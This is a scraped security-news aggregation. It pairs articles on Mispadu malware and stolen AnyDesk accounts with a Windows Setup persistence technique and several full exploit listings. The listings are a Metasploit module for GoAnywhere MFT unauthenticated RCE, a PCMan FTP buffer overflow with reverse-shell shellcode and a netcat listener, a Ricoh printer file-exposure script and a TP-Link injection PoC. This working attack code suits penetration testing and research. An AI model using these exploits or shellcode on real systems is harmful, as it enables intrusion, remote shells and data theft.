When the Windows Operating system is installed via a clean installation or via an upgrade, the Windows Setup binary is executed. The Windows setup allows… 
Continue reading → Persistence – Windows Setup Script

Skip to content

When the Windows Operating system is installed via a clean installation or via an upgrade, the Windows Setup binary is executed. The Windows setup allows custom scripts to be executed such as the _SetupComplete.cmd_ and _ErrorHandler.cmd_ to enable the installation of applications or the execution of other tasks during or after the Windows setup process is completed. These scripts are stored in the following location:

    %WINDIR%\Setup\Scripts\SetupComplete.cmd
    %WINDIR%\Setup\Scripts\ErrorHandler.cmd

Using the _ErrorHandler.cmd_ script it is possible to execute arbitrary code when the Windows operating system is upgraded. Even though it could be considered as an unconventional tactic, it could be combined with scheduled tasks for example to run Windows Setup and establish persistence. The following code can be used as a proof of concept of code execution that will display a message box when the Windows Setup binary is initiated:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Windows\_setup1
{
    internal static class Program
    {
        \[STAThread\]
        static void Main()
        {
            string message = "Visit pentestlab.blog";
            string title = "Pentestlaboratories";
            MessageBox.Show(message, title);
        }
    }
}

Windows Setup Script – Message Box Code

Since the Windows Setup will look during execution and when an error is caused in the setup process for the presence of _ErrorHandler.cmd_ inside the _Scripts_ folder, it is possible to use this script to execute arbitrary code.

Windows Setup Script Path

Running the _setup.exe_ will cause an error which as a result will force the execution of _ErrorHandler.cmd_ script.

Windows Setup Script – Message Box

Replacing the message box executable with an implant will allow a command and control session to be established.

Windows Setup Script – C2

The process tree of the implant is specified below:

    Setup.exe --> cmd.exe --> demon.x64.exe

Windows Setup Script – Process Tree

**References**

1.  https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
2.  https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html

**Post navigation**

Persistence – Windows Setup Script

The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico.
The attacks entail a new variant of the malware that was first observed in 2019, Palo Alto Networks Unit 42 said in a report published last week.
Propagated via phishing mails, Mispadu is a Delphi-based information stealer

Malware / Financial Security

The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico.

The attacks entail a new variant of the malware that was first observed in 2019, Palo Alto Networks Unit 42 said in a report published last week.

Propagated via phishing mails, Mispadu is a Delphi-based information stealer known to specifically infect victims in the Latin American (LATAM) region. In March 2023, Metabase Q revealed that Mispadu spam campaigns harvested no less than 90,000 bank account credentials since August 2022.

It's also part of the larger family of LATAM banking malware, including Grandoreiro, which was dismantled by Brazilian law enforcement authorities last week.

The latest infection chain identified by Unit 42 employs rogue internet shortcut files contained within bogus ZIP archive files that leverage CVE-2023-36025 (CVSS score: 8.8), a high-severity bypass flaw in Windows SmartScreen. It was addressed by Microsoft in November 2023.

"This exploit revolves around the creation of a specifically crafted internet shortcut file (.URL) or a hyperlink pointing to malicious files that can bypass SmartScreen's warnings," security researchers Daniela Shalev and Josh Grunzweig said.

"The bypass is simple and relies on a parameter that references a network share, rather than a URL. The crafted .URL file contains a link to a threat actor's network share with a malicious binary."

Mispadu, once launched, reveals its true colors by selectively targeting victims based on their geographic location (i.e., Americas or Western Europe) and system configurations, and then proceeds to establish contact with a command-and-control (C2) server for follow-on data exfiltration.

In recent months, the Windows flaw has been exploited in the wild by multiple cybercrime groups to deliver DarkGate and Phemedrone Stealer malware in recent months.

Mexico has also emerged as a top target for several campaigns over the past year that have been found to propagate information stealers and remote access trojans like AllaKore RAT, AsyncRAT, Babylon RAT. This constitutes a financially-motivated group dubbed TA558 that has attacked the hospitality and travel sectors in the LATAM region since 2018.

The development comes as Sekoia detailed the inner workings of DICELOADER (aka Lizar or Tirion), a time-tested custom downloader used by the Russian e-crime group tracked as FIN7. The malware has been observed delivered via malicious USB drives (aka BadUSB) in the past.

"DICELOADER is dropped by a PowerShell script along with other malware of the intrusion set's arsenal such as Carbanak RAT," the French cybersecurity firm said, calling out its sophisticated obfuscation methods to conceal the C2 IP addresses and the network communications.

It also follows AhnLab's discovery of two new malicious cryptocurrency mining campaigns that employ booby-trapped archives and game hacks to deploy miner malware that mine Monero and Zephyr.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Mispadu Banking Trojan Exploiting Windows SmartScreen Flaw

By Waqas
It's crucial to note that this sale of compromised AnyDesk accounts isn't connected to the security breach incident disclosed by the company on February 2, 2024.
This is a post from HackRead.com Read the original post: Thousands of Stolen AnyDesk Login Credentials Sold on Dark Web

Cybersecurity researchers have identified multiple threat actors on a Russian language dark web forum actively selling AnyDesk accounts, ranging from 18,000 to 30,000 accounts.

On February 2, 2024, AnyDesk, a popular remote desktop application, disclosed a security breach incident involving unauthorized access to its production systems by unknown hackers.

Now, in its latest blog post published on Sunday, February 4, 2024, cybersecurity researchers at Resecurity disclosed alarming findings: multiple threat actors are selling compromised AnyDesk login credentials on both the clear web and the dark web.

It’s crucial to note that the sale of AnyDesk credentials on the dark web is separate from the recent security breach. According to Resecurity, the stolen login credentials being sold are a result of infostealing malware infecting PCs to harvest sensitive information.

This parallels a similar incident in June 2023, where hackers were found selling 100,000 ChatGPT login accounts. These accounts were obtained through devices infected with Raccoon, Vidar, and Redline malware worldwide.

According to Resecurity’s blog post, researchers have identified a threat actor operating under the alias “Jobaaaaa,” who has been observed selling 18,317 compromised AnyDesk accounts. These accounts are being offered for sale for $15,000 worth of Bitcoin (BTC) or Monero (XMR) cryptocurrency, with transactions facilitated through escrow services.

AnyDesk accounts being sold – Screenshot translated from Russian to English by Hackread.com using Yandex AI translator (Credit: Resecurity)

However, Alon Gal of Hudson Rock has countered Resecurity’s findings, stating that the threat actor is actually selling over 30,000 AnyDesk accounts. Despite this difference, the use of Escrow—a trusted third-party payment service—by the hacker adds a level of credibility to the offer.

These compromised AnyDesk accounts are being marketed on Exploitin, a cybercrime and hacker forum accessible on both the clear and dark web and primarily operating in Russian. This forum has gained notoriety for facilitating various cybercrimes, including exploiting vulnerabilities, selling databases, and leaking sensitive information.

Interestingly, it’s the same platform where administrators of the Genesis cybercrime market acknowledged the seizure of their clear web domain in April 2023.

****Timestamp Disaster****

Resecurity’s latest revelation centers on the timestamps related to the sale of compromised accounts. The timestamps visible on the shared screenshots illustrate instances of successful unauthorized access on February 3, 2024, after the disclosure of the security incident.

Furthermore, researchers have verified that the compromised accounts include those of both individual users and enterprises. This highlights the potential for a significant disaster for organizations and unsuspecting users if these accounts fall into the wrong hands. As a precautionary measure, it is crucial for all AnyDesk users, irrespective of their location, to promptly change their passwords.

The screenshot shared by the threat actor with Resecurity displays recent successful login sessions from the AnyDesk accounts currently being sold on the dark web forum.

****The potential impact****

The potential impact, whether on an individual or enterprise, would be devastating. Here’s what could happen if a functioning AnyDesk account for either an individual or an enterprise falls into the hands of a malicious threat actor:

****For Individual****

*   **Financial Loss:** Hackers could use stolen credentials to make fraudulent transactions, steal money from linked accounts, or commit financial extortion.
*   **Data Theft:** Personal data like documents, photos, and browsing history could be stolen and sold or used for identity theft.
*   **Identity Theft:** Hackers could impersonate the individual online or over the phone to steal their identity or commit other crimes.
*   **Reputational Damage:** Stolen accounts could be used to spread misinformation or engage in other harmful activities, damaging the individual’s reputation.
*   **Operational Disruption:** Individuals might lose access to important accounts or data if hackers change passwords or lock them out.

****For enterprises:****

*   **Financial Losses:** Businesses could suffer financial losses due to fraud, data breaches, and ransomware attacks.
*   **Data Theft:** Sensitive business data, trade secrets, and customer information could be stolen and sold or used for competitive advantage.
*   **Employee Impersonation:** Hackers could impersonate employees to gain access to sensitive systems or data.
*   **Reputational Damage:** Data breaches and other security incidents can damage a company’s brand image and customer trust.
*   **Operational Disruption:** Stolen credentials could be used to disrupt business operations, causing productivity loss and downtime.
*   **Ransomware Attacks:** Hackers could encrypt data and demand a ransom payment to decrypt it.

**What Should Victims Do?**

Here are some steps that individuals and enterprises can take to protect themselves:

*   **Change passwords immediately:** If you think your AnyDesk credentials might be compromised, change your password immediately and enable two-factor authentication if available.
*   **Be cautious of phishing emails:** Don’t click on links or open attachments in suspicious emails, even if they appear to be from AnyDesk.
*   **Report suspicious activity:** If you see any suspicious activity on your AnyDesk account, report it to AnyDesk immediately.
*   **Use strong passwords:** Use strong, unique passwords for all your online accounts, and avoid using the same password for multiple accounts.
*   **Enable two-factor authentication:** Two-factor authentication adds an extra layer of security by requiring a second factor, such as a code from your phone, to log in.
*   **Stay informed:** Keep yourself informed about the latest security threats and best practices.

Nevertheless, regardless of your location or whether you recently changed your AnyDesk account password, it’s critical to change the password once again immediately. The timestamps of login sessions from these accounts authenticate their legitimacy.

1.  **New Windows Infostealer ‘ExelaStealer’ Sold on Dark Web**
2.  **Thousands of Dark Web Posts Expose ChatGPT Abuse Plans**
3.  **360m WhatsApp Records Shared on Telegram and Dark Web**
4.  **Cloudflare Hacked After State Actors Leverages Okta Breach**
5.  **TeamViewer Used to Obtain Remote Access, Deploy Ransomware**

Thousands of Stolen AnyDesk Login Credentials Sold on Dark Web

By Waqas
The new variant of Mispadu Stealer was discovered by Palo Alto's Unit 42 researchers while investigating the Windows Defender SmartScreen vulnerability.
This is a post from HackRead.com Read the original post: Mispadu Stealer’s New Variant Targets Browser Data of Mexican Users

Originally, since 2019, Mispadu Stealer targeted Spanish- and Portuguese-speaking victims, but the new variant aims at URLs associated with Mexican citizens.

In a recent development reported by Unit 42 researchers, a new variant of the infamous Mispadu Stealer has emerged, targeting users primarily in Mexico with stealthy information-stealing techniques. The discovery shows the persistent evolution of this malware, showcasing its adaptability and the challenges it poses to cybersecurity efforts.

Initially identified in 2019, Mispadu Stealer has been a persistent threat, known for its stealthy operations primarily targeting Spanish- and Portuguese-speaking victims. The latest variant, however, demonstrates a high level of sophistication, specifically targeting regions and URLs associated with Mexican citizens.

The discovery of this new variant came as part of Unit 42’s Managed Threat Hunting initiative, while researchers were investigating the Windows Defender SmartScreen CVE-2023-36025 vulnerability.

This vulnerability, categorized as a security feature bypass within the Windows SmartScreen function, allows attackers to circumvent warnings and execute malicious payloads. Exploiting this vulnerability, the Mispadu Stealer variant was found to employ a crafty technique involving the creation of internet shortcut files (.url) or hyperlinks pointing to malicious files, effectively bypassing SmartScreen’s warnings.

One of the key findings in this investigation is the malware’s use of a parameter referencing a network share, which, when embedded in a .url file, directs victims to a threat actor’s network share to retrieve and execute the malicious payload without triggering SmartScreen warnings. This technique, while not limited to Mispadu Stealer, showcases the malware’s ability to adapt and evolve its tactics.

Further analysis of the new variant reveals a sophisticated operation that selectively targets victims based on their geographic location and system configurations. By querying the bias between the local time zone and UTC and performing checks based on the victim’s location, the malware ensures its execution primarily within specific regions, such as the Americas and certain parts of Western Europe.

Statistics of infected countries (Unit 42)

Once executed, the malware proceeds to interact with the victim’s browser history, extracting URLs and checking them against a targeted list. Notably, the malware employs encryption algorithms and techniques to evade detection, highlighting the evolving sophistication of its information-stealing capabilities.

The attribution of this new variant to previous Mispadu campaigns highlights the challenges in combating evolving cybersecurity threats. While similarities in tactics and infrastructure provide insights into the malware’s origins, the ever-changing nature of such threats demands a comprehensive approach to cybersecurity.

As Mispadu continues to evolve and target unsuspecting users, cybersecurity experts emphasize the importance of staying informed on the latest threat intelligence, deploying strong endpoint protection measures, and advocating a culture of cybersecurity awareness among employees and users. By adopting proactive measures and leveraging collective intelligence, organizations can better defend against emerging threats like the new variant of Mispadu Stealer.

1.  **Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks**
2.  **IBM X-Force Discovers Gootloader Malware Variant- GootBot**
3.  **Fake TeamViewer download ads distributing new ZLoader variant**
4.  **New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs**
5.  **MidgeDropper Variant Hits Work-from-Home Employees on Windows**

Mispadu Stealer’s New Variant Targets Browser Data of Mexican Users

This Metasploit module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to          create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere          MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'James Horseman', # Original auth bypass PoC/Analysis          'Zach Hanley' # Original auth bypass PoC/Analysis        ],        'References' => [          ['CVE', '2024-0204'],          ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory          ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']        ],        'DisclosureDate' => '2024-01-22',        'Platform' => %w[linux win],        'Arch' => [ARCH_JAVA],        'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.        'Targets' => [          [            # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp            'Automatic', {}          ],          [            'Linux',            {              'Platform' => 'linux',              'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'            }          ],          [            'Windows',            {              'Platform' => 'win',              'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'            },          ],        ],        'DefaultOptions' => {          'RPORT' => 8001,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # A new admin account is created, which the exploit can't destroy.            CONFIG_CHANGES,            # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),      ]    )  end  def check    # We can query an undocumented unauthenticated REST API endpoint and pull the version number.    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    json_data = res.get_json_document    product = json_data.dig('data', 'product')    version = json_data.dig('data', 'version')    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?    # As per the Fortra advisory, the following version are affected:    # * Fortra GoAnywhere MFT 6.x from 6.0.1    # * Fortra GoAnywhere MFT 7.x before 7.4.1    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))      return CheckCode::Appears("#{product} #{version}")    end    Exploit::CheckCode::Safe("#{product} #{version}")  end  def exploit    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So    # we generate the username/password pair we want to use.    # Note: We cannot delete the administrator account that we create.    admin_username = Rex::Text.rand_text_alpha_lower(8)    admin_password = Rex::Text.rand_text_alphanumeric(16)    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick    # a random one that we know works.    path_segments = %w[styles fonts auth help]    path_segment = path_segments.sample    # This is CVE-2024-0204...    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),        'j_id_u:creteAdminGrid:username' => admin_username,        'j_id_u:creteAdminGrid:password' => admin_password,        'j_id_u:creteAdminGrid:password_hinput' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,        'j_id_u:creteAdminGrid:submitButton' => '',        'createAdminForm_SUBMIT' => 1      }    )    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method    # loginNewAdminUser and update our current session, so we dont need to manually login.    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")    end    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")    store_credentials(admin_username, admin_password)    # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.    if target.name == 'Automatic'      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),        'keep_cookies' => true      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')      end      # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using      # the Java system property "os.name".      os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})      unless os_match        fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')      end      # To perform the JSP payload upload, we need to know the product installation path.      install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})      unless install_match        fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')      end      # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.      found_target = targets.find do |t|        os_match[1].downcase.include? t.name.downcase      end      unless found_target        fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")      end      # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.      detected_target = found_target.dup      detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]      print_status("Automatic targeting, detected OS: #{detected_target.name}")      print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")    else      detected_target = target    end    # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then    # change to the directory we want to upload to, then upload the file.    path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'    # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp    adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']    adminroot_path += path_separator unless adminroot_path.end_with? path_separator    adminroot_path += 'adminroot'    adminroot_path += path_separator    viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'j_id_4u:j_id_4v:newPath_focus' => '',        'j_id_4u:j_id_4v:newPath_input' => '/',        'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,        'j_id_4u:j_id_4v:NewPathButton' => '',        'j_id_4u_SUBMIT' => 1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')    end    # We require a regID value form the page to upload a file, so we pull that out here.    vs_input = res.get_html_document.at('input[name="reqId"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')    end    request_id = vs_input['value']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'javax.faces.partial.ajax' => 'true',        'javax.faces.source' => 'uploadID',        'javax.faces.partial.execute' => 'uploadID',        'javax.faces.partial.render' => '@none',        'uploadID' => 'uploadID',        'uploadID_sessionCheck' => 'true',        'reqId' => request_id,        'whenFileExists_focus' => '',        'whenFileExists_input' => 'rename',        'uploaderType' => 'filemanager',        'j_id_4i_SUBMIT' =>  1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')    end    jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'    message = Rex::MIME::Message.new    message.add_part(request_id, nil, nil, 'form-data; name="reqId"')    message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')    message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')    message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')    message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')    message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')    message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')    message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')    message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")    # We can now upload our payload...    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'ctype' => 'multipart/form-data; boundary=' + message.bound,      'data' => message.to_s    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')    end    # Register our payload so it is deleted when the session is created.    jsp_filepath = adminroot_path + jsp_filename    print_status("Dropped payload: #{jsp_filepath}")    # We are using the FileDropper mixin to automatically delete this file after a session has been created.    register_file_for_cleanup(jsp_filepath)    # A copy of the files this user uploads is left here:    # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp    # We register these to be deleted, but they appear to be locked, preventing deleting.    userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']    userdoc_path += path_separator unless userdoc_path.end_with? path_separator    userdoc_path += 'userdata'    userdoc_path += path_separator    userdoc_path += 'documents'    userdoc_path += path_separator    userdoc_path += admin_username    userdoc_path += path_separator    register_file_for_cleanup(userdoc_path + jsp_filename)    register_dir_for_cleanup(userdoc_path)    # Finally, trigger our payload via a GET request...    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename)    )    # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web    # interface or REST API.  end  # Helper method to pull out a viewstate identifier from a requests HTML response.  def get_viewstate(endpoint)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, endpoint),      'keep_cookies' => true    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")    end    vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")    end    vs_input['value']  end  def store_credentials(username, password)    service_data = {      address: datastore['RHOST'],      port: datastore['RPORT'],      service_name: 'GoAnywhere MFT Admin Interface',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: username,      private_data: password,      private_type: :password    }.merge(service_data)    credential_core = create_credential(credential_data)    login_data = {      core: credential_core,      last_attempted_at: DateTime.now,      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  endend

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

PCMan FTP Server version 2.0 pwn remote buffer overflow exploit.

    # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow# Date: 09/25/2023# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)# Vendor Homepage: http://pcman.openfoundry.org/# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z# Version: 2.0# Tested on: Windows XP SP3#!/usr/bin/pythonimport socket#buffer = 'A' * 2500#offset = 2007#badchars=\x00\x0a\x0d#return_address=0x7e429353 (USER32.dll)#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"#nc -nvlp 4444overflow = ("\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9""\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d""\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f""\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53""\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55""\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1""\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52""\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6""\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37""\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf""\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3""\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4""\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75""\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7""\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e""\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17""\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd""\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94""\xd7")shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow# Change IP/Port as required  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:        print "\nSending evil buffer..."        s.connect(('192.168.146.135',21))        data = s.recv(1024)        s.send('USER anonymous' +'\r\n')        data = s.recv(1024)        s.send('PASS anonymous\r\n')        s.send('pwd ' + shellcode + '\r\n')        s.close()        print "\nExploit completed successfully!."except:        print "Could not connect to FTP!"

PCMan FTP Server 2.0 Buffer Overflow

TP-LINK TL-WR740N suffers from an html injection vulnerability.

    # Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Shujaat Amin (ZEROXINN)# Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: Windows 10---------------------------POC-----------------------------1) Go to your routers IP (192.168.0.1)2) Go to Access control --> Target,rule3) Click on add new 5) Type <h1>Hello<h1> in Target Description box6) Click on Save, and now you can see html injection on the webpage

TP-LINK TL-WR740N HTML Injection

Ricoh printers suffer from directory and file exposure vulnerabilities.

    #Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023#Exploit Author: Thomas Heverin (Heverin Hacker)#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py#Version: Ricoh Printers - All Versions#Tested on: Windows#CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)from ftplib import FTPdef ftp_connect(ip):    try:        ftp = FTP(ip)        ftp.login("guest", "guest")        print(f"Connected to {ip} over FTP as 'guest'")        return ftp    except Exception as e:        print(f"Failed to connect to {ip} over FTP: {e}")        return Noneif __name__ == "__main__":    target_ip = input("Enter the Ricoh Printer IP address: ")        ftp_connection = ftp_connect(target_ip)    if ftp_connection:        try:            while True:                file_list = ftp_connection.nlst()                print("List of Ricoh printer files and directories:")                for index, item in enumerate(file_list, start=1):                    print(f"{index}. {item}")                                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1                if file_index < 0:                    break                                if 0 <= file_index < len(file_list):                    selected_file = file_list[file_index]                    lines = []                    ftp_connection.retrlines("RETR " + selected_file, lines.append)                    print(f"Contents of '{selected_file}':")                    for line in lines:                        print(line)                else:                    print("Invalid file index.")        except Exception as e:            print(f"Failed to perform operation: {e}")        finally:            ftp_connection.quit()

Ricoh Printer Directory / File Exposure

Typora version 1.7.4 suffers from a command injection vulnerability.

